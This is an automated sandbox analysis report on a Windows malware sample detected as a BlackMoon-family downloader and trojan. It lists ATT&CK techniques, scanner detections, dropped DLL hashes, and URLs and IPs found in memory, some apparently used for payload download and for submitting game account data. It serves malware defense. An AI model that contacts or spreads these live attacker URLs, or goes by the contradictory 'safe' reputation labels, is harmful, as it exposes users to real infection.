                    Process Injection                    		21
                    Masquerading                    		LSA Secrets1
                    Virtualization/Sandbox Evasion                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Valid Accounts                    		Cached Domain Credentials2
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Virtualization/Sandbox Evasion                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Access Token Manipulation                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    1734098836319.exe70%VirustotalBrowse
                    1734098836319.exe76%ReversingLabsWin32.Downloader.Sinresby
                    1734098836319.exe100%AviraHEUR/AGEN.1356166
                    1734098836319.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll48%ReversingLabsWin32.Trojan.Generic
                    C:\Windows\SysWOW64\Dult.dll0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://Mozilla/4.00%Avira URL Cloudsafe
                    http://www.eyuyan.com)DVarFileInfo$0%Avira URL Cloudsafe
                    http://.https0%Avira URL Cloudsafe
                    http://ocsp.certum.pl0.0%Avira URL Cloudsafe
                    http://43.226.78.44:8000/macweb/submit/0%Avira URL Cloudsafe
                    http://cacerts.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crt00%Avira URL Cloudsafe
                    https://pki.jemmylovejenny.tk/rpa00%Avira URL Cloudsafe
                    https://wwug.lanzouq.com/huohansss0%Avira URL Cloudsafe
                    http://www.eyuyan.com0%Avira URL Cloudsafe
                    http://61.160.207.3:8003/api0%Avira URL Cloudsafe
                    http://43.226.78.44:8000/macweb/submit/&mac_address=channel_number=url0%Avira URL Cloudsafe
                    http://crls.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crl00%Avira URL Cloudsafe
                    https://www.uc.cn/ipIP:https://api.ip.sb/iphttp://pv.sohu.com/cityjson0%Avira URL Cloudsafe
                    https://pki.jemmylovejenny.tk/cps0/0%Avira URL Cloudsafe
                    https://wwug.lanzouq.com/huohanssss.dll0%Avira URL Cloudsafe
                    http://subca.ocsp-certum.com0.0%Avira URL Cloudsafe
                    http://i.2.wen888.shop:4002/index/user.html0%Avira URL Cloudsafe
                    http://crls.pki.jemmylovejenny.tk/EVRootCA.crl00%Avira URL Cloudsafe
                    https://wwug.lanzouq.com/huohanqqqQ.dll0%Avira URL Cloudsafe
                    http://i.2.wen888.shop:4002/index/user.html&code=data&Game_Cient_Key_=&Game_St_=&Game_St_Key_=&gold=0%Avira URL Cloudsafe
                    https://www.lanzout.comRefererMozilla/5.00%Avira URL Cloudsafe
                    https://www.ip138.comUser-Agent:0%Avira URL Cloudsafe
                    https://cesg1.oss-cn-beijing.aliyuncs.com/;W0%Avira URL Cloudsafe
                    http://ocsp.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA0O0%Avira URL Cloudsafe
                    http://cacerts.pki.jemmylovejenny.tk/EVRootCA.crt0?0%Avira URL Cloudsafe
                    https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllo0%Avira URL Cloudsafe
                    https://cesg1.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
                    https://www.certum.pl/repository.00%Avira URL Cloudsafe
                    http://bbs.dult.cn/thread-24328-1-1.html0%Avira URL Cloudsafe
                    https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll0%Avira URL Cloudsafe
                    http://www.eyuyan.comservice0%Avira URL Cloudsafe
                    https://User-Agent:Mozilla/4.00%Avira URL Cloudsafe
                    http://ocsp.pki.jemmylovejenny.tk/EVRootCA0=0%Avira URL Cloudsafe
                    https://wwug.lanzouq.com/huohanqqq0%Avira URL Cloudsafe
                    https://www.uc.cn/ip0%Avira URL Cloudsafe
                    https://www.lanzout.com0%Avira URL Cloudsafe
                    http://www.dult.cn/100.txt0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
                    		39.103.20.61
                    		truefalse
                      		unknown
                      cesg1.oss-cn-beijing.aliyuncs.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://43.226.78.44:8000/macweb/submit/false
                        • Avira URL Cloud: safe
                        		unknown
                        https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.eyuyan.com)DVarFileInfo$1734098836319.exe, 8001[1].dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://pki.jemmylovejenny.tk/rpa01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://Mozilla/4.01734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://.https1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.certum.pl0.1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://61.160.207.3:8003/api8001[1].dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://wwug.lanzouq.com/huohansss1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.eyuyan.com1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cacerts.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crt01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://43.226.78.44:8000/macweb/submit/&mac_address=channel_number=url1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.wegame.com.cn/api/v1/wegame.platform.game.TicketProxy/GetGameTicket1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://crls.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA.crl01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.uc.cn/ipIP:https://api.ip.sb/iphttp://pv.sohu.com/cityjson1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.certum.pl/l3.crl0a1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                            		high
                            http://repository.certum.pl/ca.cer0:1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                              		high
                              http://subca.ocsp-certum.com0.1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://wwug.lanzouq.com/huohanssss.dll1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://repository.certum.pl/ctnca.cer01734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                		high
                                http://cs-g2-crl.thawte.com/ThawteCSG2.crl01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                  		high
                                  http://subca.ocsp-certum.com011734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                    		high
                                    http://pv.sohu.com/cityjson1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      https://pki.jemmylovejenny.tk/cps0/1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crls.pki.jemmylovejenny.tk/EVRootCA.crl01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.certum.pl/CPS01734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                        		high
                                        https://wwug.lanzouq.com/huohanqqqQ.dll1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://i.2.wen888.shop:4002/index/user.html1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://api.ip.sb/ip1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                          		high
                                          http://crl.certum.pl/ctnca.crl0k1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                            		high
                                            http://i.2.wen888.shop:4002/index/user.html&code=data&Game_Cient_Key_=&Game_St_=&Game_St_Key_=&gold=1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://ocsp.thawte.com01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                              		high
                                              https://www.lanzout.comRefererMozilla/5.01734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cesg1.oss-cn-beijing.aliyuncs.com/;W1734098836319.exe, 00000000.00000002.2952794089.00000000008E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ip.cn/index.php1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                		high
                                                https://www.ip138.comUser-Agent:1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://cacerts.pki.jemmylovejenny.tk/EVRootCA.crt0?1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dllo1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.certum.pl/CPS01734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                                  		high
                                                  http://ocsp.pki.jemmylovejenny.tk/SHA1TimeStampingServicesCA0O1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cesg1.oss-cn-beijing.aliyuncs.com/1734098836319.exe, 00000000.00000002.2952794089.0000000000901000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.certum.pl/repository.01734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bbs.dult.cn/thread-24328-1-1.html1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.thawte.com/ThawtePCA.crl01734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                    		high
                                                    http://www.eyuyan.comservice1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ip138.com1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                      		high
                                                      http://ocsp.pki.jemmylovejenny.tk/EVRootCA0=1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://wwug.lanzouq.com/huohanqqq1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://User-Agent:Mozilla/4.01734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.lanzout.com1734098836319.exe, 1734098836319.exe, 00000000.00000003.1742756255.000000000323E000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000002.2953729868.000000000331E000.00000040.10000000.00040000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1746204629.0000000003274000.00000004.00000020.00020000.00000000.sdmp, 1734098836319.exe, 00000000.00000003.1742800871.0000000003241000.00000004.00000020.00020000.00000000.sdmp, 8001[1].dll.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.certum.pl/ca.crl0h1734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                                        		high
                                                        https://api.ttt.sh/ip/qqwry/1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                          		high
                                                          http://repository.certum.pl/l3.cer01734098836319.exe, 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Dult.dll.0.drfalse
                                                            		high
                                                            https://api.ttt.sh/ip/qqwry/ip1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                              		high
                                                              https://www.uc.cn/ip1734098836319.exe, 1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.dult.cn/100.txt1734098836319.exe, 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              43.226.78.44
                                                              		unknownChina
                                                              		134762CHINANET-LIAONING-DALIAN-MANCHINANETLiaoningprovinceDalifalse
                                                              39.103.20.61
                                                              		sc-2dwy.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                                              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1583248
                                                              Start date and time:2025-01-02 09:27:32 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 6m 19s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:5
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:1734098836319.exe
                                                              Detection:MAL
                                                              Classification:mal100.rans.troj.evad.winEXE@1/3@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 49
                                                              • Number of non-executed functions: 201
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 52.149.20.212, 13.107.246.45
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              No context

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CHINANET-LIAONING-DALIAN-MANCHINANETLiaoningprovinceDaliloligang.arm.elfGet hashmaliciousMiraiBrowse
                                                              • 59.44.115.229
                                                              spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 182.201.246.96
                                                              db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                              • 123.185.162.24
                                                              nklppc.elfGet hashmaliciousUnknownBrowse
                                                              • 219.149.1.128
                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 59.46.216.198
                                                              rebirth.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 182.201.61.201
                                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 59.46.171.92
                                                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                              • 43.226.54.234
                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                              • 182.201.168.77
                                                              meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 182.201.246.93
                                                              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdarmv4l.elfGet hashmaliciousUnknownBrowse
                                                              • 59.82.127.195
                                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                                              • 39.106.221.219
                                                              DF2.exeGet hashmaliciousUnknownBrowse
                                                              • 59.110.52.4
                                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 121.198.26.154
                                                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 47.103.186.206
                                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                              • 8.130.21.60
                                                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                                              • 39.103.20.97
                                                              0000000000000000.exeGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.97
                                                              kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                              • 42.120.21.89
                                                              botx.sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 47.124.9.123

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37f463bf4616ecd445d4a1937da06e19ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                                              • 39.103.20.61
                                                              16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                                              • 39.103.20.61
                                                              6a7e35.msiGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.61
                                                              ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.61
                                                              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.61
                                                              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.61
                                                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                                              • 39.103.20.61
                                                              0000000000000000.exeGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.61
                                                              1.ps1Get hashmaliciousUnknownBrowse
                                                              • 39.103.20.61
                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                              • 39.103.20.61

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\1734098836319.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:modified
                                                              Size (bytes):229376
                                                              Entropy (8bit):6.1512063055315265
                                                              Encrypted:false
                                                              SSDEEP:3072:HlZIltUhIioS11QLUV9CO1DDaJY6G3n8kkrXvwqyeEsZhCzPLqZXO8KtZjUN:Hl+e1QLUnkrX4lACzPOZ
                                                              MD5:0269CBD8F0D55E1B87BE84F31EE9F4C0
                                                              SHA1:8569CDEFBF755DB8757D65FE9C15DCAF79161C4D
                                                              SHA-256:BEE91060C96CBD0607171906ADB7C98E956C1D09149C1F3C4537DB223987AE8B
                                                              SHA-512:293CDB4949BA524FEE86C835DF149E9ED6FEAF9BC3C9DB85F7F4AEDA4B03016666EAB85131CE2C68D169324B5B36C189945002FFCB6ADD2C4008B33459EBFD43
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, Author: Joe Security
                                                              • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8001[1].dll, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 48%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..}............b....................../...{................../...[...........................Rich....................PE..L.....mg...........!.........................................................`..........................................L...8........ .......................0.......................................................................................text.............................. ..`.rdata........... ..................@..@.data...<:.......`..................@....rsrc........ .......@..............@..@.reloc..2"...0...0...P..............@..B................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\submit[1].json

                                                              Download File
                                                              Process:C:\Users\user\Desktop\1734098836319.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):80
                                                              Entropy (8bit):4.771762239033051
                                                              Encrypted:false
                                                              SSDEEP:3:YM9EGJwHNMWCSKWWIZp0sJ/0q:YMxJwVbKRyasJp
                                                              MD5:D23BB21574417F12B294995F7C692153
                                                              SHA1:11073AC83A3C8E5292920BF76BE1851411C1E9FA
                                                              SHA-256:C48336A513BF05B3369B1F874C9F2EC19ADD4E55571C0354676C2C2360B42287
                                                              SHA-512:CAA26520E2FDF2C520DDC17341119F13F7B91C855026574DD077E1E3BA30B5A7D3BAFB29D675C77873AC82EFE6A16B247DFEC6324DBD6633F69BCBFD05575E12
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:{"is_active": true, "url": "https://cesg1.oss-cn-beijing.aliyuncs.com/8001.dll"}

                                                              C:\Windows\SysWOW64\Dult.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\1734098836319.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1323832
                                                              Entropy (8bit):5.936047058989444
                                                              Encrypted:false
                                                              SSDEEP:12288:taur3falhmSv7PYH3wEploa6ie5VOOETgno+CmL/injt3ZJ5pZJ5pZJoUV:IuzM7k3wJmOKMCmL2
                                                              MD5:A76C18B971D6427CDFFFD317C90AAA2D
                                                              SHA1:58873852F11E80E27194A5DCFB64D22E13248190
                                                              SHA-256:48D5F6E4C6C71DD950EA069970489580E5AD78BC475B5D4F472C8409D02B3A18
                                                              SHA-512:C73915F9085CF621E409399EBD64F0B8BE8C53FC1AE404A67C2B8D7F7A9CEE8276397D36B002235109650A2C8C07CA6EC34A8841534ACBB15EF26FC4FE0CEF96
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:low
